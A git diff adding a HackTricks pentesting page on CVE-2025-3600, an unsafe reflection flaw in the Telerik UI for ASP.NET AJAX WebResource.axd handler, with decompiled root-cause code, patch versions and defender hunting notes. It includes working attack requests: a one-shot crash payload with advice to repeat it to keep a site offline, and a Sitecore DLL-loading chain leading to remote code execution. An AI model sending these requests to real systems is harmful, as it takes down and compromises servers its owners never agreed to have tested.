diff --git a/src/SUMMARY.md b/src/SUMMARY.md index 323d407ed86..720772cd441 100644 --- a/src/SUMMARY.md +++ b/src/SUMMARY.md @@ -488,6 +488,7 @@ - [Spring Actuators](network-services-pentesting/pentesting-web/spring-actuators.md) - [Symfony](network-services-pentesting/pentesting-web/symphony.md) - [Tomcat](network-services-pentesting/pentesting-web/tomcat/README.md) + - [Telerik Ui Aspnet Ajax Unsafe Reflection Webresource Axd](network-services-pentesting/pentesting-web/telerik-ui-aspnet-ajax-unsafe-reflection-webresource-axd.md) - [Uncovering CloudFlare](network-services-pentesting/pentesting-web/uncovering-cloudflare.md) - [Vuejs](network-services-pentesting/pentesting-web/vuejs.md) - [VMWare (ESX, VCenter...)](network-services-pentesting/pentesting-web/vmware-esx-vcenter....md) diff --git a/src/network-services-pentesting/pentesting-web/iis-internet-information-services.md b/src/network-services-pentesting/pentesting-web/iis-internet-information-services.md index f9046626bf5..cd338fcd77f 100644 --- a/src/network-services-pentesting/pentesting-web/iis-internet-information-services.md +++ b/src/network-services-pentesting/pentesting-web/iis-internet-information-services.md @@ -325,6 +325,16 @@ Hunting notes (defenders) - Unbacked managed modules inside w3wp.exe; strings like Encrypt/Decrypt (ECB), Compress/Decompress, GetContext, Run. - Repeated delimiters like "STAR" in traffic; mismatched or even future timestamps on ASPX/assemblies. +## Telerik UI WebResource.axd unsafe reflection (CVE-2025-3600) + +Many ASP.NET apps embed Telerik UI for ASP.NET AJAX and expose the unauthenticated handler Telerik.Web.UI.WebResource.axd. When the Image Editor cache endpoint is reachable (type=iec), the parameters dkey=1 and prtype enable unsafe reflection that executes any public parameterless constructor pre‑auth. This yields a universal DoS primitive and can escalate to pre‑auth RCE on apps with insecure AppDomain.AssemblyResolve handlers. + +See detailed techniques and PoCs here: + +{{#ref}} +telerik-ui-aspnet-ajax-unsafe-reflection-webresource-axd.md +{{#endref}} + ## Old IIS vulnerabilities worth looking for diff --git a/src/network-services-pentesting/pentesting-web/telerik-ui-aspnet-ajax-unsafe-reflection-webresource-axd.md b/src/network-services-pentesting/pentesting-web/telerik-ui-aspnet-ajax-unsafe-reflection-webresource-axd.md new file mode 100644 index 00000000000..8dc64d70173 --- /dev/null +++ b/src/network-services-pentesting/pentesting-web/telerik-ui-aspnet-ajax-unsafe-reflection-webresource-axd.md @@ -0,0 +1,212 @@ +# Telerik UI for ASP.NET AJAX – Unsafe Reflection via WebResource.axd (type=iec) + +{{#include ../../banners/hacktricks-training.md}} + +> Pre‑auth constructor execution in Telerik UI for ASP.NET AJAX Image Editor cache handler enables universal DoS and, in many apps, pre‑auth RCE via target‑specific gadgets (CVE-2025-3600). + +## TL;DR + +- Affected component/route: Telerik.Web.UI.WebResource.axd with query type=iec (Image Editor cache handler). Exposed pre‑auth in many products. +- Primitive: Attacker controls a type name (prtype). The handler resolves it with Type.GetType() and invokes Activator.CreateInstance() before verifying interface type-safety. Any public parameterless .NET type constructor will run. +- Impact: + - Universal pre‑auth DoS with a .NET framework gadget (PowerShell WSMan finalizer). + - Often elevates to pre‑auth RCE in real deployments by abusing app‑specific gadgets, especially insecure AppDomain.AssemblyResolve handlers. +- Fix: Update to Telerik UI for ASP.NET AJAX 2025.1.416+ or remove/lock the handler. + +## Affected versions + +- Telerik UI for ASP.NET AJAX versions 2011.2.712 through 2025.1.218 (inclusive) are vulnerable. +- Fixed in 2025.1.416 (released 2025-04-30). Patch immediately or remove/lock down the handler. + +## Affected surface and quick discovery + +- Check exposure: + - GET /Telerik.Web.UI.WebResource.axd should return something other than 404/403 if the handler is wired. + - Inspect web.config for handlers mapping to Telerik.Web.UI.WebResource.axd. +- Trigger path for the vulnerable code-path requires: type=iec, dkey=1, and prtype=. + +Example probe and generic trigger: + +```http +GET /Telerik.Web.UI.WebResource.axd?type=iec&dkey=1&prtype=Namespace.Type, Assembly +``` + +Notes +- Some PoCs use dtype; the implementation checks dkey=="1" for the download flow. +- prtype must be assembly-qualified or resolvable in the current AppDomain. + +## Root cause – unsafe reflection in ImageEditorCacheHandler + +The Image Editor cache download flow constructs an instance of a type supplied in prtype and only later casts it to ICacheImageProvider and validates the download key. The constructor has already run when validation fails. + +
+Relevant decompiled flow + +```csharp +// entrypoint +public void ProcessRequest(HttpContext context) +{ + string text = context.Request["dkey"]; // dkey + string text2 = context.Request.Form["encryptedDownloadKey"]; // download key + ... + if (this.IsDownloadedFromImageProvider(text)) // effectively dkey == "1" + { + ICacheImageProvider imageProvider = this.GetImageProvider(context); // instantiation happens here + string key = context.Request["key"]; + if (text == "1" && !this.IsValidDownloadKey(text2)) + { + this.CompleteAsBadRequest(context.ApplicationInstance); + return; // cast/check happens after ctor has already run + } + using (EditableImage editableImage = imageProvider.Retrieve(key)) + { + this.SendImage(editableImage, context, text, fileName); + } + } +} + +private ICacheImageProvider GetImageProvider(HttpContext context) +{ + if (!string.IsNullOrEmpty(context.Request["prtype"])) + { + return RadImageEditor.InitCacheImageProvider( + RadImageEditor.GetICacheImageProviderType(context.Request["prtype"]) // [A] + ); + } + ... +} + +public static Type GetICacheImageProviderType(string imageProviderTypeName) +{ + return Type.GetType(string.IsNullOrEmpty(imageProviderTypeName) ? + typeof(CacheImageProvider).FullName : imageProviderTypeName); // [B] +} + +protected internal static ICacheImageProvider InitCacheImageProvider(Type t) +{ + // unsafe: construct before enforcing interface type-safety + return (ICacheImageProvider)Activator.CreateInstance(t); // [C] +} +``` +
+ +Exploit primitive: Controlled type string → Type.GetType resolves it → Activator.CreateInstance runs its public parameterless constructor. Even if the request is rejected afterwards, gadget side‑effects already occurred. + +## Universal DoS gadget (no app-specific gadgets required) + +Class: System.Management.Automation.Remoting.WSManPluginManagedEntryInstanceWrapper in System.Management.Automation (PowerShell) has a finalizer that disposes an uninitialized handle, causing an unhandled exception when GC finalizes it. This reliably crashes the IIS worker process shortly after instantiation. + +One‑shot DoS request: + +```http +GET /Telerik.Web.UI.WebResource.axd?type=iec&dkey=1&prtype=System.Management.Automation.Remoting.WSManPluginManagedEntryInstanceWrapper,+System.Management.Automation,+Version%3d3.0.0.0,+Culture%3dneutral,+PublicKeyToken%3d31bf3856ad364e35 +``` + +Notes +- Keep sending periodically to keep the site offline. You may observe the constructor being hit in a debugger; crash occurs on finalization. + +## From DoS to RCE – escalation patterns + +Unsafe constructor execution unlocks many target‑specific gadgets and chains. Hunt for: + +1) Parameterless constructors that process attacker input +- Some ctors (or static initializers) immediately read Request query/body/cookies/headers and (de)serialize them. +- Example (Sitecore): a ctor chain reaches GetLayoutDefinition() which reads HTTP body "layout" and deserializes JSON via JSON.NET. + +2) Constructors that touch files +- Ctros that load or deserialize config/blobs from disk can be coerced if you can write to those paths (uploads/temp/data folders). + +3) Constructors performing app-specific ops +- Resetting state, toggling modules, or terminating processes. + +4) Constructors/static ctors that register AppDomain event handlers +- Many apps add AppDomain.CurrentDomain.AssemblyResolve handlers that build DLL paths from args.Name without sanitization. If you can influence type resolution you can coerce arbitrary DLL loads from attacker‑controlled paths. + +5) Forcing AssemblyResolve via Type.GetType +- Request a non-existent type to force CLR resolution and invoke registered (possibly insecure) resolvers. Example assembly-qualified name: + +``` +This.Class.Does.Not.Exist, watchTowr +``` + +6) Finalizers with destructive side effects +- Some types delete fixed-path files in finalizers. Combined with link-following or predictable paths this can enable local privilege escalation in certain environments. + +## Example pre‑auth RCE chain (Sitecore XP) + +- Step 1 – Pre‑auth: Trigger a type whose static/instance ctor registers an insecure AssemblyResolve handler (e.g., Sitecore’s FolderControlSource in ControlFactory). +- Step 2 – Post‑auth: Obtain write into a resolver-probed directory (e.g., via an auth bypass or weak upload) and plant a malicious DLL. +- Step 3 – Pre‑auth: Use CVE‑2025‑3600 with a non-existent type and a traversal‑laden assembly name to force the resolver to load your planted DLL → code execution as the IIS worker. + +Trigger examples + +```http +# Load the insecure resolver (no auth on many setups) +GET /-/xaml/Sitecore.Shell.Xaml.WebControl + +# Coerce the resolver via Telerik unsafe reflection +GET /Telerik.Web.UI.WebResource.axd?type=iec&dkey=1&prtype=watchTowr.poc,+../../../../../../../../../watchTowr +``` + +## Validation, hunting and DFIR notes + +- Safe lab validation: Fire the DoS payload and watch for app pool recycle/unhandled exception tied to the WSMan finalizer. +- Hunt in telemetry: + - Requests to /Telerik.Web.UI.WebResource.axd with type=iec and odd prtype values. + - Failed type loads and AppDomain.AssemblyResolve events. + - Sudden w3wp.exe crashes/recycles following such requests. + +## Mitigation + +- Patch to Telerik UI for ASP.NET AJAX 2025.1.416 or later. +- Remove or restrict exposure of Telerik.Web.UI.WebResource.axd where possible (WAF/rewrites). +- Ignore or harden prtype handling server-side (upgrade applies proper checks before instantiation). +- Audit and harden custom AppDomain.AssemblyResolve handlers. Avoid building paths from args.Name without sanitization; prefer strong-named loads or whitelists. +- Constrain upload/write locations and prevent DLL drops into probed directories. +- Monitor for non-existent type load attempts to catch resolver abuse. + +## Cheat‑sheet + +- Presence check: + - GET /Telerik.Web.UI.WebResource.axd + - Look for handler mapping in web.config +- Exploit skeleton: + +```http +GET /Telerik.Web.UI.WebResource.axd?type=iec&dkey=1&prtype= +``` + +- Universal DoS: + +```http +...&prtype=System.Management.Automation.Remoting.WSManPluginManagedEntryInstanceWrapper,+System.Management.Automation,+Version%3d3.0.0.0,+Culture%3dneutral,+PublicKeyToken%3d31bf3856ad364e35 +``` + +- Trigger resolver: + +``` +This.Class.Does.Not.Exist, watchTowr +``` + +## Related techniques + +- IIS post-exploitation, .NET key extraction, and in‑memory loaders: + +{{#ref}} +iis-internet-information-services.md +{{#endref}} + +- ASP.NET ViewState deserialization and machineKey abuses: + +{{#ref}} +../../pentesting-web/deserialization/exploiting-__viewstate-parameter.md +{{#endref}} + +## References + +- [watchTowr labs – More than DoS: Progress Telerik UI for ASP.NET AJAX Unsafe Reflection (CVE-2025-3600)](https://labs.watchtowr.com/more-than-dos-progress-telerik-ui-for-asp-net-ajax-unsafe-reflection-cve-2025-3600/) +- [Black Hat USA 2019 – SSO Wars: The Token Menace (Mirosh & Muñoz) – DoS gadget background](https://i.blackhat.com/USA-19/Wednesday/us-19-Munoz-SSO-Wars-The-Token-Menace-wp.pdf) +- [ZDI – Abusing arbitrary file deletes to escalate privilege](https://www.zerodayinitiative.com/blog/2022/3/16/abusing-arbitrary-file-deletes-to-escalate-privilege-and-other-great-tricks) +- [watchTowr – Is “B” for Backdoor? (Sitecore chain CVE-2025-34509)](https://labs.watchtowr.com/is-b-for-backdoor-pre-auth-rce-chain-in-sitecore-experience-platform/) + +{{#include ../../banners/hacktricks-training.md}} \ No newline at end of file